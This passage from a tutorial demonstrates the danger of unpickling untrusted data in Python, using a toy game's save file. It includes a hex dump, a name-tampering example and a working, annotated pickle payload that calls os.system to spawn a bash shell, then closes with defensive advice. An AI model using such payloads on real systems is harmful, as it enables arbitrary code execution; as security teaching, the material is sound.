dict, etc.) we define a format which can be read directly back. However, for stateful types (e.g. file handles, objects, sockets, etc.) we may need to execute a deserialisation stub for the serialised object to appropriately initialise its state.
The Python programming language has two serialisation libraries:
pickle library is considerably more popular as
marshal is highly dependent on your interpreter version. When reading the
pickle documentation you are greeted with:
Warning The pickle module is not secure. Only unpickle data you trust. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never unpickle data that could have come from an untrusted source, or that could have been tampered with. Consider signing data with hmac if you need to ensure that it has not been tampered with. Safer serialization formats such as json may be more appropriate if you are processing untrusted data. See Comparison with json.
I will demonstrate the dangers of blindly deserialising data using
pickle. Imagine you are playing a dungeon crawler then exit midway through.
$ python game.py kills: 0, deaths: 0, xp: 0 Welcome to the dungeon, player  a Dark Knight approaches! enter any key to proceed: [] player attacks Dark Knight dealing 21! [] Dark Knight attacks player dealing 13! [] player attacks Dark Knight dealing 19! [] Dark Knight attacks player dealing 15! [] player attacks Dark Knight dealing 20! player killed the Dark Knight! player gained 100xp!  a Wizar approaches! enter any key to proceed: ^C
However, when you restart the game you notice something.
$ python game.py loaded savefile kills: 1, deaths: 0, xp: 100 Welcome to the dungeon, player [snip]
The game preserved the state of your previous playthrough when you abruptly quit. We look at the game’s
def main() -> None: if (game_state := load_recent_save()) is None: game_state = empty_game_state() else: print("loaded savefile") [snip]
We investigate the
def load_recent_save() -> GameState: try: with open(".save", "rb") as f: unserialised = pickle.load(f) except FileNotFoundError: return None player = unserialised.player player.health = 200 return GameState(player, Enemy())
The game is blindly deserialising the file
.save. We can inspect this file.
00000000: 8004 95bf 0000 0000 0000 008c 085f 5f6d .............__m 00000010: 6169 6e5f 5f94 8c09 5361 7665 5374 6174 ain__...SaveStat 00000020: 6594 9394 2981 947d 9428 8c09 7469 6d65 e...)..}.(..time 00000030: 7374 616d 7094 8c08 6461 7465 7469 6d65 stamp...datetime 00000040: 948c 0864 6174 6574 696d 6594 9394 430a ...datetime...C. 00000050: 07e4 0308 1723 3900 21fd 9485 9452 948c .....#9.!....R.. 00000060: 0670 6c61 7965 7294 6800 8c06 506c 6179 .player.h...Play 00000070: 6572 9493 9429 8194 7d94 288c 046e 616d er...)..}.(..nam 00000080: 6594 8c06 706c 6179 6572 948c 056b 696c e...player...kil 00000090: 6c73 944b 018c 0664 6561 7468 7394 4b00 ls.K...deaths.K. 000000a0: 8c0a 6578 7065 7269 656e 6365 944b 648c ..experience.Kd. 000000b0: 0668 6561 6c74 6894 4bc8 8c06 6461 6d61 .health.K...dama 000000c0: 6765 944b 1475 6275 622e ge.K.ubub.
pickle is a binary serialisation format but we can still see some textual data. What if we modify this file?
We successfully changed our player’s name.
$ python game.py loaded savefile kills: 1, deaths: 0, xp: 100 Welcome to the dungeon, haxxed  a Wizar approaches!
pickle works is that it serialises the data and executes the steps involved in grabbing that data back out. What happens if we overwrite these deserialisation steps with our own?
$ printf "cos\nsystem\n(S'bash'\ntR." > .save $ python game.py [user@beelzebub]: /tmp/tmp.aLb9xQwYe4>$
Here we have spawned a shell. The annotated payload is shown below.
(each field has a separating newline) cos\nsystem <- push os.system to stack ( <- marker S 'bash' <- 'bash' string constant t <- build tuple ('bash') R <- apply ('bash') to os.module . <- stop
To construct your own payloads you can reverse engineer the format.
What is the takeaway from all of this? Do not deserialise untrusted data - or more broadly: do not blindly accept user data. All properties under user control can and should be treated as if the user will manipulate them maliciously. To defend yourself against this attack, the data could be encrypted using a symmetric key within the game itself although this approach falls into the obfuscation game with reverse engineers. Alternatively, the information could be stored on a trusted remote host and securely transmitted using PKI.